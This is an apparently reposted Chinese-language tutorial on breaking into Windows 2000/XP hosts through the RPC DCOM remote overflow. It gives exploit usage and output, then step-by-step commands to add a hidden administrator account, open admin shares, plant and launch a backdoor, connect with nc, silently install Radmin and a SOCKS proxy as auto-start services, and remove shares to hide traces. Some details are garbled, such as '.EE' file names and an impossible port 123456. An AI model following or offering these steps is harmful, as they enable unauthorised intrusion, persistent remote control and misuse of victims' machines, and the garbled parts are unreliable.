1、利用dcomrpc遠(yuǎn)程溢出漏洞入侵主機(jī)最近，網(wǎng)上非常流行dcomrpc，那今天我們就教你詳細(xì)的利用dcomrpc入侵。和入侵之后必須做什么。 需要的工具： 很好的： radmin.EE 掃描工具: retinarpcdcom.EE 溢出攻擊工具:RpcDcom(通用溢出工具) 腳本開啟 telnet工具：telnet.vbe opentelnet.EE resumetelnet.EE 代理：sksockserver.EE 后門程序：WinEggDropShellPro3thVersion 好了，該做的都做的差不多了。 先使用retinarpcdcom.EE掃描一個(gè)網(wǎng)段。查找有rpc漏洞的機(jī)子，

2、這個(gè)漏洞需要135端口開放，(想必 隨便掃一下就會(huì)發(fā)現(xiàn)有許多主機(jī)開放的135端口) 211.217.50.xx 第一個(gè)主機(jī)就被掃出來又此漏洞。 看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下其他的缺陷主機(jī)開了3389端口我們可以上去看一下是xp版本還是win2k是win2k server版本展開命令行： 查看dcomrpc的用法 用法 dcomrpc -d options F:/hack>cd rpc/dcomrpc RPC DCOM Expl01t coded by .:oc192.us:. Security Complied and Modi

3、fied by Expl01t Usage: dcomrpc -d <host> options Options: -d: Hostname to attack Required -t: Type Default: 0 -r: Return address Default: Selected from target -p: Attack port Default: 135 -l: Bindshell port Default: 666 Types: 0 0x0018759f: Win2k-Universal 1 0x0100139d: WinXP-Universal 開始進(jìn)行溢出：

4、 F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0 RPC DCOM remote expl01t - .:oc192.us:. Security Complied and recorrected by Expl01t + Resolving host. + Done. + Expl01ting.Just wait. 等到出現(xiàn)，說明溢出成功 c:/winnt/system32> 接著我們建立用戶 c:/winnt/system32>net user blueye$ 1111 /add 命令成功完成。 把用戶添加成超級(jí)管理員 c:/winnt/

5、system32>net localgroup administrators blueye$ /add 命令成功完成。 看看共享開了沒有沒有的話把共享開開 c:/winnt/system32>net share 清單是空的。 c:/winnt/system32>net share ipc$ 命令成功完成。 c:/winnt/system32>net share admin$ 命令成功完成。 到這里我們?nèi)肭指嬉欢温?建 立 IPC$ 連 接 ，也可以使用tftp上傳 ，先和對(duì)方建立連接 F:/hack>net use /211.217.50.xx/ipc$ &quo

6、t;1111" /user:blueye$ 上 傳 一 個(gè) 后 門 程 序 到 對(duì) 方 的 主 機(jī) 里 F:/hack>copy d:/inject.EE /211.217.50.xx/admin$/system32 F:/hack>copy d:/tback.dll /211.217.50.xx/admin$/system32 然后運(yùn)行后門程序，我們可以使用at命令。但是有的機(jī)器把a(bǔ)t明令禁止了，建議直接開起telnet 使用opentelnet.EE 關(guān)閉開啟的telnet使用resumetelnet / /ip user password 如果忘記開共享可以使用腳本

7、開啟 telnet來開共享，用法: cscript telnet.vbe ip user password null port (null是驗(yàn)證方式) F:/hack>opentenet /211.217.50.xx blueye$ 1111 1 4567 F:/hack>telnet 211.217.50.xx 4567 (省略) 連接并運(yùn)行后門程序運(yùn)行后門程序命令 根目錄：inject.EE -run (后門使用方法和安裝都在zip文件里面包含了) 后門端口123456 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDr

8、opShell Matrix Version Melody 下面安裝radmin，配置好的radmin客戶端有4個(gè)文件。配置radmin客戶端可參考相關(guān)文章。 radmin.reg raddrv.dll admdll.dll r_server.EE 把這個(gè)4個(gè)文件copy c:/winnt/system32 在目錄下面執(zhí)行命令 c:/winnt/system32>r_server /s radmin.reg -導(dǎo)入注冊(cè)表 c:/winnt/system32>r_server /install /silence -安裝radmin.并且不顯示托盤 c:/winnt/system32&

9、gt;net start r_server - 啟動(dòng)服務(wù) 安裝sock代理 把sksockserver.EE copy c:/winnt/system32 c:/winnt/system32>sksockserver /install -安裝服務(wù) c:/winnt/system32>sksockserver -config port 1234 -端口定在1234 自己可以改 c:/winnt/system32>sksockserver -config starttype 2 -開機(jī)自動(dòng)啟動(dòng) c:/winnt/system32>net start skserver -啟動(dòng)

10、服務(wù) 最后刪除共享 net share ipc$ /del net share admin$ /del 在安裝radmin的時(shí)候你發(fā)現(xiàn)有人已經(jīng)安裝了。 看操作 (我輸入的內(nèi)容) 后門連接 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody #(pslist) Melody #(pskill r_server) Melody #(shell) c:/winnt/system32>(del r_server.EE) c:/winnt/system32>(del admdll.dll) c:/winnt/system32>(del raddrv.dll) copy你自己的上去，然后安裝 省事的辦法直接導(dǎo)入注冊(cè)表，然后重新輸入安裝命令運(yùn)行，就可以了，只是在原來默認(rèn)端口上